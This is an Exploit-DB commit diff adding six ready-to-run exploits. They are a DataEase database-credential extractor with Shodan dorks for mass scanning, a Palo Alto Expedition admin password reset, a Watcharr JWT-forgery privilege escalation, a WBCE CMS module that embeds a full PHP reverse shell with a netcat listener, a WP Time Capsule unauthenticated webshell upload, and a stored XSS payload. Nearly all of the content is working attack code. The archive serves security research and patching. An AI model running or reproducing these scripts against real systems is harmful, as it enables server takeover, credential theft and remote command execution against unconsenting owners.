DB: 2025-04-07

7 changes to exploits/shellcodes/ghdb

DataEase 2.4.0 - Database Configuration Information Exposure

Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover
Watcharr 1.43.0 - Remote Code Execution (RCE)
WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)

Backup and Staging by WP Time Capsule 1.22.21 - Unauthenticated Arbitrary File Upload

Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)
This commit is contained in:
Exploit-DB 2025-04-07 00:16:26 +00:00
parent 2bd993a7c3
commit 881542919e
7 changed files with 579 additions and 0 deletions

93
exploits/java/webapps/52128.py Executable file
View file

@ -0,0 +1,93 @@
################################################################
############################ #
#- Exploit Title: DataEase Database Creds Extractor #
#- Shodan Dork: http.html:"dataease" #
#- FOFA Dork: body="dataease" && title=="DataEase" #
#- Exploit Author: ByteHunter #
#- Email: 0xByteHunter@proton.me #
#- vulnerable Versions: 2.4.0-2.5.0 #
#- Tested on: 2.4.0 #
#- CVE : CVE-2024-30269 #
############################ #
################################################################
import argparse
import requests
import re
import json
from tqdm import tqdm
def create_vulnerability_checker():
vulnerable_count = 0
def check_vulnerability(url):
nonlocal vulnerable_count
endpoint = "/de2api/engine/getEngine;.js"
full_url = f"{url}{endpoint}"
headers = {
"Host": url.split('/')[2],
"Accept-Encoding": "gzip, deflate, br",
"Accept": "*/*",
"Accept-Language": "en-US;q=0.9,en;q=0.8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36",
"Connection": "close",
"Cache-Control": "max-age=0"
}
try:
response = requests.get(full_url, headers=headers, timeout=5)
if response.status_code == 200:
try:
json_data = response.json()
config = json_data.get("data", {}).get("configuration", None)
if config:
config_data = json.loads(config)
username = config_data.get("username")
password = config_data.get("password")
port = config_data.get("port")
if username and password:
vulnerable_count += 1
print(f"Vulnerable: {full_url}")
print(f"Username: {username}")
print(f"Password: {password}")
if port is not None:
print(f"Port Number: {port}")
except (json.JSONDecodeError, KeyError):
print(f"Invalid JSON response from {full_url}")
except requests.RequestException:
pass
return vulnerable_count
return check_vulnerability
def main():
parser = argparse.ArgumentParser(description="CVE-2024-30269 DataEase Database Creds Extractor")
parser.add_argument('-u', '--url', type=str, help='Single target')
parser.add_argument('-l', '--list', type=str, help='URL File List')
args = parser.parse_args()
check_vulnerability = create_vulnerability_checker()
if args.url:
check_vulnerability(args.url)
elif args.list:
try:
with open(args.list, 'r') as file:
urls = [url.strip() for url in file.readlines() if url.strip()]
total_urls = len(urls)
for url in tqdm(urls, desc="Processing URLs", unit="url"):
check_vulnerability(url)
# tqdm.write(f"Vulnerable Instances: {check_vulnerability(url)}/{total_urls}")
except FileNotFoundError:
print(f"File not found: {args.list}")
else:
print("provide a URL with -u or a file with -l.")
if __name__ == "__main__":
main()

View file

@ -0,0 +1,57 @@
################################################################################################
############################ #
#- Exploit Title: PoC for Admin Account Password Reset of Palo Alto Networks Expedition tool #
#- Shodan Dork: html:"expedition project" #
#- FOFA Dork: "expedition project" && icon_hash="1499876150" #
#- Exploit Author: ByteHunter #
#- Email: 0xByteHunter@proton.me #
#- Vulnerable Versions: 1.2 < 1.2.92 #
#- Tested on: 1.2.90.1 & 1.2.75 #
#- CVE : CVE-2024-5910 #
############################ #
################################################################################################
import requests
import argparse
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter("ignore", InsecureRequestWarning)
ENDPOINT = '/OS/startup/restore/restoreAdmin.php'
def send_request(base_url):
url = f"{base_url}{ENDPOINT}"
print(f"Testing URL: {url}")
try:
response = requests.get(url, verify=False, timeout=7)
if response.status_code == 200:
print("✓ Admin password restored to: 'paloalto'\n")
print("✓ admin panel is now accessable via ==> admin:paloalto creds")
else:
print(f"Request failed with status code: {response.status_code}\n")
except requests.exceptions.RequestException as e:
print(f"Error sending request to {url}") #{e}
def main():
parser = argparse.ArgumentParser(description='Palo Alto Expedition - Admin Account Password Reset PoC')
parser.add_argument('-u', '--url', type=str, help='single target URL')
parser.add_argument('-l', '--list', type=str, help='URL target list')
args = parser.parse_args()
if args.url:
send_request(args.url)
elif args.list:
try:
with open(args.list, 'r') as file:
urls = file.readlines()
for base_url in urls:
send_request(base_url.strip())
except FileNotFoundError:
print(f"File not found: {args.list}")
else:
print("I need a URL address with -u or a URL file list with -l.")
if __name__ == '__main__':
main()

View file

@ -0,0 +1,108 @@
# CVE-2024-48827 exploit by Suphawith Phusanbai
# Affected Watcharr version 1.43.0 and below.
import argparse
import requests
import json
import jwt
from pyfiglet import Figlet
f = Figlet(font='slant',width=100)
print(f.renderText('CVE-2024-48827'))
#store JWT token and UserID \ เก็บ token กับ UserID
jwt_token = None
user_id = None
#login to obtain JWT token / ล็อคอินเพื่อรับ JWT Token
def login(host, port, username, password):
url = f'http://{host}:{port}/api/auth/'
#payload in login API request \ payload ใน json
payload = {
'username': username,
'password': password
}
headers = {
'Content-Type': 'application/json'
}
#login to obtain JWT token \ ล็อคอินเพิ่อเก็บ JWT token แล้วใส่ใน jwt_token object
try:
response = requests.post(url, data=json.dumps(payload), headers=headers)
if response.status_code == 200:
token = response.json().get('token')
if token:
print(f"[+] SUCCESS! JWT Token: {token}")
global jwt_token
jwt_token = token
#decode JWT token and store UserID in UserID object \ ดีโค้ด JWT token แล้วเก็บค่า UserID ใส่ใน UserID object
decoded_payload = jwt.decode(token, options={"verify_signature": False})
global user_id
user_id = decoded_payload.get('userId')
return token
else:
print("[-] Check your password again!")
else:
print(f"[-] Failed :(")
print(f"Response: {response.text}")
except Exception as e:
print(f"Error! HTTP response code: {e}")
#craft the admin token(to make this work you need to know admin username) \ สร้าง admin JWT token ขึ้นมาใหม่โดยใช้ token ที่ล็อคอิน
def create_new_jwt(original_token):
try:
decoded_payload = jwt.decode(original_token, options={"verify_signature": False})
#userID = 1 is always the admin \ userID ลำดับที่ 1 คือ admin เสมอ
decoded_payload['userId'] = 1
new_token = jwt.encode(decoded_payload, '', algorithm='HS256')
print(f"[+] New JWT Token: {new_token}")
return new_token
except Exception as e:
print(f"[-] Failed to create new JWT: {e}")
#privilege escalation with the crafted JWT token \ PE โดยการใช้ crafted admin token
def privilege_escalation(host, port, adminuser, token):
#specify API endpoint for giving users admin role \ เรียกใช้งาน API สำหรับให้สิทธิ์ user admin
url = f'http://{host}:{port}/api/server/users/{user_id}'
# permission 3 givefull access privs you can also use 6 and 9 to gain partial admin privileges. \ ให้สิทธิ์ admin ทั้งหมดด้วย permission = 3
payload = {
"permissions": 3
}
headers = {
'Authorization': f'{token}',
'Content-Type': 'application/json'
}
try:
response = requests.post(url, data=json.dumps(payload), headers=headers)
if response.status_code == 200:
print(f"[+] Privilege Escalation Successful! The current user is now an admin!")
else:
print(f"[-] Failed to escalate privileges. Response: {response.text}")
except Exception as e:
print(f"Error during privilege escalation: {e}")
#exampl usage: python3 CVE-2024-48827.py -u dummy -p dummy -host 172.22.123.13 -port 3080 -adminuser admin
#usage
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit CVE-2024-48827 to obtain JWT token and escalate privileges.')
parser.add_argument('-host', '--host', type=str, help='Host or IP address', required=True)
parser.add_argument('-port', '--port', type=int, help='Port', required=True, default=3080)
parser.add_argument('-u', '--username', type=str, help='Username for login', required=True)
parser.add_argument('-p', '--password', type=str, help='Password for login', required=True)
parser.add_argument('-adminuser', '--adminuser', type=str, help='Admin username to escalate privileges', required=True)
args = parser.parse_args()
#step 1: login
token = login(args.host, args.port, args.username, args.password)
#step 2: craft the admin token
if token:
new_token = create_new_jwt(token)
#step 3: Escalate privileges with crafted token. Enjoy!
if new_token:
privilege_escalation(args.host, args.port, args.adminuser, new_token)

View file

@ -0,0 +1,199 @@
# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
# Date: 3/22/2025
# Exploit Author: Swammers8
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS
# Version: 1.6.3 and prior
# Tested on: Ubuntu 24.04.2 LTS
# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE
#!/bin/bash
# Make a zip file exploit
# Start netcat listener
if [[ $# -ne 2 ]]; then
echo "[*] Description:"
echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
echo "[*] It will create an infected module .zip file and start a netcat listener."
echo "[*] Once the zip is created, you will have to login to the admin page"
echo "[*] to upload and install the module, which will immediately run the shell"
echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
echo "[!] Usage:"
echo "[*] $0 <lhost> <lport>"
exit 1
fi
if [ -z "$(which nc)" ]; then
echo "[!] Netcat is not installed."
exit 1
fi
ip=$1
port=$2
rm -rf shellModule.zip
rm -rf shellModule
mkdir shellModule
echo [*] Crafting Payload
cat <<EOF > shellModule/info.php
<?php
/**
*
* @category modules
* @package Reverse Shell
* @author Swammers8
* @link https://swammers8.github.io/
* @license http://www.gnu.org/licenses/gpl.html
* @platform example.com
* @requirements PHP 5.6 and higher
* @version 1.3.3.7
* @lastmodified May 22 2025
*
*
*/
\$module_directory = 'modshell';
\$module_name = 'Reverse Shell';
\$module_function = 'page';
\$module_version = '1.3.3.7';
\$module_platform = '2.10.x';
\$module_author = 'Swammers8';
\$module_license = 'GNU General Public License';
\$module_description = 'This module is a backdoor';
?>
EOF
cat <<EOF > shellModule/install.php
<?php
set_time_limit (0);
\$VERSION = "1.0";
\$ip = '$ip'; // CHANGE THIS
\$port = $port; // CHANGE THIS
\$chunk_size = 1400;
\$write_a = null;
\$error_a = null;
\$shell = 'uname -a; w; id; /bin/sh -i';
\$daemon = 0;
\$debug = 0;
if (function_exists('pcntl_fork')) {
\$pid = pcntl_fork();
if (\$pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if (\$pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
\$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
if (!\$sock) {
printit("\$errstr (\$errno)");
exit(1);
}
\$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
\$process = proc_open(\$shell, \$descriptorspec, \$pipes);
if (!is_resource(\$process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);
printit("Successfully opened reverse shell to \$ip:\$port");
while (1) {
if (feof(\$sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof(\$pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);
if (in_array(\$sock, \$read_a)) {
if (\$debug) printit("SOCK READ");
\$input = fread(\$sock, \$chunk_size);
if (\$debug) printit("SOCK: \$input");
fwrite(\$pipes[0], \$input);
}
if (in_array(\$pipes[1], \$read_a)) {
if (\$debug) printit("STDOUT READ");
\$input = fread(\$pipes[1], \$chunk_size);
if (\$debug) printit("STDOUT: \$input");
fwrite(\$sock, \$input);
}
if (in_array(\$pipes[2], \$read_a)) {
if (\$debug) printit("STDERR READ");
\$input = fread(\$pipes[2], \$chunk_size);
if (\$debug) printit("STDERR: \$input");
fwrite(\$sock, \$input);
}
}
fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);
function printit (\$string) {
if (!\$daemon) {
print "\$string\n";
}
}
?>
EOF
echo [*] Zipping to shellModule.zip
zip -r shellModule.zip shellModule
rm -rf shellModule
echo [*] Please login to the WBCE admin panel to upload and install the module
echo [*] Starting listener
nc -lvnp $port
echo
echo
echo "[*] Done!"
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"

93
exploits/php/webapps/52131.py Executable file
View file

@ -0,0 +1,93 @@
# Exploit Title: WordPress Backup and Staging Plugin ≤ 1.21.16 - Arbitrary File Upload to RCE
# Original Author: Patchstack (hypothetical)
# Exploit Author: Al Baradi Joy
# Exploit Date: April 5, 2025
# Vendor Homepage: https://wp-timecapsule.com/
# Software Link: https://wordpress.org/plugins/wp-time-capsule/
# Version: Up to and including 1.21.16
# Tested Versions: 1.21.16
# CVE ID: CVE-2024-8856
# Vulnerability Type: Arbitrary File Upload / Remote Code Execution
# Description:
# The WordPress plugin "Backup and Staging by WP Time Capsule" up to version 1.21.16
# allows unauthenticated attackers to upload arbitrary files via the upload.php endpoint.
# This can lead to remote code execution if a PHP file is uploaded and executed directly
# from the wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/ directory.
# Proof of Concept: Yes
# Categories: WordPress Plugin, File Upload, RCE
# CVSS Score: 9.9 (Critical)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
# Notes:
# Successful exploitation provides shell access as the user running the web server.
# Ensure target is using the vulnerable plugin version before launching the attack.
import requests
# Banner
def display_banner():
print("="*80)
print("Exploit Title: CVE-2024-8856 - WordPress Backup and Staging
Plugin Arbitrary File Upload")
print("Made By Al Baradi Joy")
print("="*80)
# Function to detect if the target supports HTTPS or falls back to HTTP
def detect_protocol(domain):
https_url = f"https://{domain}"
http_url = f"http://{domain}"
try:
response = requests.get(https_url, timeout=5, allow_redirects=True)
if response.status_code < 400:
print(f"[✔] Target supports HTTPS: {https_url}")
return https_url
except requests.exceptions.RequestException:
print("[!] HTTPS not available, falling back to HTTP.")
try:
response = requests.get(http_url, timeout=5, allow_redirects=True)
if response.status_code < 400:
print(f"[✔] Target supports HTTP: {http_url}")
return http_url
except requests.exceptions.RequestException:
print("[✖] Target is unreachable on both HTTP and HTTPS.")
exit(1)
# Exploit function
def exploit(target_url):
target_url = detect_protocol(target_url.replace("http://",
"").replace("https://", "").strip())
upload_url =
f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload.php"
shell_url =
f"{target_url}/wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/shell.php?cmd=whoami"
files = {
'file': ('shell.php', '<?php system($_GET["cmd"]); ?>',
'application/x-php')
}
try:
print(f"[+] Attempting to upload shell to: {upload_url}")
response = requests.post(upload_url, files=files, timeout=10)
if response.status_code == 200:
print(f"[✔] Exploit successful! Webshell available at:
{shell_url}")
else:
print(f"[✖] Failed to upload shell. Status code:
{response.status_code}")
except requests.exceptions.ConnectionError:
print("[✖] Connection failed. Target may be down.")
except requests.exceptions.Timeout:
print("[✖] Request timed out. Target is slow or unresponsive.")
except requests.exceptions.RequestException as e:
print(f"[✖] Unexpected error: {e}")
# Main execution
if __name__ == "__main__":
display_banner()
target = input("[?] Enter the target URL (without http/https):
").strip()
exploit(target)

View file

@ -0,0 +1,23 @@
# Exploit Title: Reservit Hotel < 3.0 - Admin+ Stored XSS
# Date: 2024-10-01
# Exploit Author: Ilteris Kaan Pehlivan
# Vendor Homepage: https://wpscan.com/plugin/reservit-hotel/
# Version: Reservit Hotel 2.1
# Tested on: Windows, WordPress, Reservit Hotel < 3.0
# CVE : CVE-2024-9458
The plugin does not sanitise and escape some of its settings, which could
allow high privilege users such as admin to perform Stored Cross-Site
Scripting attacks even when the unfiltered_html capability is disallowed
(for example in multisite setup).
1. Install and activate Reservit Hotel plugin.
2. Go to Reservit hotel > Content
3. Add the following payload to the Button text > French field sane save: "
style=animation-name:rotation onanimationstart=alert(/XSS/)//
4. The XSS will trigger upon saving and when any user will access the
content dashboard again
References:
https://wpscan.com/vulnerability/1157d6ae-af8b-4508-97e9-b9e86f612550/
https://www.cve.org/CVERecord?id=CVE-2024-9458

View file

@ -5513,6 +5513,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50952,exploits/java/webapps/50952.py,"Confluence Data Center 7.18.0 - Remote Code Execution (RCE)",2022-06-10,"Fellipe Oliveira",webapps,java,,2022-06-10,2022-06-10,0,CVE-2022-26134,,,,,
50243,exploits/java/webapps/50243.py,"Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)",2021-09-01,"Fellipe Oliveira",webapps,java,,2021-09-01,2021-09-01,0,CVE-2021-26084,,,,,
36548,exploits/java/webapps/36548.txt,"Contus Job Portal - 'Category' SQL Injection",2012-01-13,Lazmania61,webapps,java,,2012-01-13,2015-03-30,1,,,,,,https://www.securityfocus.com/bid/51404/info
52128,exploits/java/webapps/52128.py,"DataEase 2.4.0 - Database Configuration Information Exposure",2025-04-06,ByteHunter,webapps,java,,2025-04-06,2025-04-06,0,CVE-2024-30269,,,,,
33048,exploits/java/webapps/33048.txt,"DirectAdmin 1.33.6 - 'CMD_REDIRECT' Cross-Site Scripting",2009-05-19,r0t,webapps,java,,2009-05-19,2014-04-27,1,CVE-2009-2216;OSVDB-55296,,,,,https://www.securityfocus.com/bid/35450/info
34293,exploits/java/webapps/34293.txt,"dotDefender 4.02 - 'clave' Cross-Site Scripting",2010-07-12,"David K",webapps,java,,2010-07-12,2014-08-08,1,,,,,,https://www.securityfocus.com/bid/41541/info
33286,exploits/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Cross-Site Scripting",2009-10-14,"Michele Orru",webapps,java,,2009-10-14,2014-05-10,1,CVE-2009-4521;OSVDB-58941,,,,,https://www.securityfocus.com/bid/36674/info
@ -12192,6 +12193,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51646,exploits/multiple/webapps/51646.txt,"Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)",2023-08-04,"Ahmet Ümit BAYRAM",webapps,multiple,,2023-08-04,2023-08-04,0,,,,,,
43440,exploits/multiple/webapps/43440.txt,"P-Synch < 6.2.5 - Multiple Vulnerabilities",2003-05-30,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00005,,,,,http://gulftech.org/advisories/P-Synch%20Multiple%20Vulnerabilities/5
51343,exploits/multiple/webapps/51343.txt,"Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-08,omurugur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2022-0020,,,,,
52129,exploits/multiple/webapps/52129.py,"Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover",2025-04-06,ByteHunter,webapps,multiple,,2025-04-06,2025-04-06,0,CVE-2024-5910,,,,,
51391,exploits/multiple/webapps/51391.py,"PaperCut NG/MG 22.0.4 - Authentication Bypass",2023-04-25,MaanVader,webapps,multiple,,2023-04-25,2023-04-25,0,CVE-2023-27350,,,,,
51452,exploits/multiple/webapps/51452.py,"PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)",2023-05-23,MaanVader,webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-27350,,,,,
35210,exploits/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",webapps,multiple,,2014-11-10,2018-01-25,0,CVE-2014-8499;CVE-2014-8498;OSVDB-114485;OSVDB-114484;OSVDB-114483,,,,,https://github.com/pedrib/PoC/blob/a2842a650de88c582e963493d5e2711aa4a1b747/advisories/ManageEngine/me_pmp_privesc.txt
@ -12378,6 +12380,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
12610,exploits/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",webapps,multiple,,2010-05-13,,1,CVE-2010-1143,,,,,
48804,exploits/multiple/webapps/48804.py,"VTENEXT 19 CE - Remote Code Execution",2020-09-11,"Marco Ruela",webapps,multiple,,2020-09-11,2020-09-11,0,,,,,,
10999,exploits/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,indoushka,webapps,multiple,,2010-01-03,,0,OSVDB-63644,,,,http://www.exploit-db.comw-agora-4.2.1-php.zip,
52130,exploits/multiple/webapps/52130.py,"Watcharr 1.43.0 - Remote Code Execution (RCE)",2025-04-06,"Suphawith Phusanbai",webapps,multiple,,2025-04-06,2025-04-06,0,CVE-2024-48827,,,,,
52132,exploits/multiple/webapps/52132.sh,"WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)",2025-04-06,Swammers8,webapps,multiple,,2025-04-06,2025-04-06,0,,,,,,
31233,exploits/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc?camnum' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",webapps,multiple,,2008-02-18,2014-01-28,1,CVE-2008-5674;OSVDB-42927,,,,,https://www.securityfocus.com/bid/27875/info
31234,exploits/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 Beta - '/show_gallery_pic?id' Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",webapps,multiple,,2008-02-18,2014-01-28,1,CVE-2008-5674;OSVDB-42928,,,,,https://www.securityfocus.com/bid/27875/info
50463,exploits/multiple/webapps/50463.txt,"WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)",2021-10-29,3ndG4me,webapps,multiple,,2021-10-29,2021-10-29,0,CVE-2021-31682,,,,,
@ -14638,6 +14642,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51597,exploits/php/webapps/51597.txt,"Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)",2023-07-19,"Mirabbas Ağalarov",webapps,php,,2023-07-19,2023-07-19,0,,,,,,
5546,exploits/php/webapps/5546.txt,"BackLinkSpider 1.1 - 'cat_id' SQL Injection",2008-05-05,K-159,webapps,php,,2008-05-04,2016-11-25,1,OSVDB-45001;CVE-2008-2096,,,,,http://advisories.echo.or.id/adv/adv95-K-159-2008.txt
34045,exploits/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 - 'cat_id' SQL Injection",2010-05-27,"sniper ip",webapps,php,,2010-05-27,2014-07-13,1,,,,,,https://www.securityfocus.com/bid/40398/info
52131,exploits/php/webapps/52131.py,"Backup and Staging by WP Time Capsule 1.22.21 - Unauthenticated Arbitrary File Upload",2025-04-06,"Al Baradi Joy",webapps,php,,2025-04-06,2025-04-06,0,CVE-2024-8856,,,,,
37208,exploits/php/webapps/37208.txt,"backupDB() 1.2.7a - 'onlyDB' Cross-Site Scripting",2012-05-16,LiquidWorm,webapps,php,,2012-05-16,2015-06-05,1,CVE-2012-2911;OSVDB-82297,,,,,https://www.securityfocus.com/bid/53575/info
15234,exploits/php/webapps/15234.txt,"BaconMap 1.0 - Local File Disclosure",2010-10-11,"John Leitch",webapps,php,,2010-10-11,2010-10-11,1,OSVDB-68598;CVE-2010-4801,,,http://www.exploit-db.com/screenshots/idlt15500/screen.png,http://www.exploit-db.combaconmap1Duroc.zip,
15233,exploits/php/webapps/15233.txt,"BaconMap 1.0 - SQL Injection",2010-10-11,"John Leitch",webapps,php,,2010-10-11,2010-10-11,1,OSVDB-68599;CVE-2010-4800,,,,http://www.exploit-db.combaconmap1Duroc.zip,
@ -29018,6 +29023,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
5911,exploits/php/webapps/5911.txt,"ResearchGuide 0.5 - 'id' SQL Injection",2008-06-23,dun,webapps,php,,2008-06-22,2016-12-09,1,OSVDB-46843;CVE-2008-2964,,,,,
19775,exploits/php/webapps/19775.txt,"Reserve Logic 1.2 Booking CMS - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,webapps,php,,2012-07-12,2012-07-12,0,CVE-2010-4980;OSVDB-83844;OSVDB-83842;OSVDB-83841;OSVDB-83840;OSVDB-83839;OSVDB-83838;OSVDB-83837;OSVDB-83836;OSVDB-83835;OSVDB-83834;OSVDB-83833;OSVDB-83832;OSVDB-83831;OSVDB-83830;OSVDB-83829;OSVDB-83828;OSVDB-83827;OSVDB-65952,,,,,https://www.vulnerability-lab.com/get_content.php?id=617
46210,exploits/php/webapps/46210.txt,"Reservic 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80,2019-01-21,2019-01-21,1,,"SQL Injection (SQLi)",,,,
52133,exploits/php/webapps/52133.txt,"Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)",2025-04-06,"Ilteris Kaan Pehlivan",webapps,php,,2025-04-06,2025-04-06,0,CVE-2024-9458,,,,,
43676,exploits/php/webapps/43676.txt,"Reservo Image Hosting Script 1.5 - Cross-Site Scripting",2018-01-17,"Dennis Veninga",webapps,php,,2018-01-17,2018-01-17,0,CVE-2018-5705,,,,,
48627,exploits/php/webapps/48627.txt,"Reside Property Management 3.0 - 'profile' SQL Injection",2020-06-30,"Behzad Khalifeh",webapps,php,,2020-06-30,2020-06-30,0,,,,,,
35541,exploits/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",webapps,php,,2014-12-15,2014-12-15,0,OSVDB-115821;OSVDB-115820;OSVDB-115819;OSVDB-115818,,,,,

Can't render this file because it is too large.